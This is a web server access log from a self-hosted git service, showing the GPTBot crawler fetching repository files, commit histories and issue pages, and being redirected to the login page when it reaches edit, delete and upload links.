[Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 11208] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10296] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" -[17/Feb/2026:17:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10383] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 11019] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:21:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:21:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:21:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject" -[17/Feb/2026:17:21:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject" -[17/Feb/2026:17:21:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject" -[17/Feb/2026:17:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11625] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11873] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9784] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11330] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10374] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" -[17/Feb/2026:17:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10737] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11977] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" -[17/Feb/2026:17:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9817] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:17:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9817] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:21:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:17:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build" -[17/Feb/2026:17:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11246] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9812] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:21:23 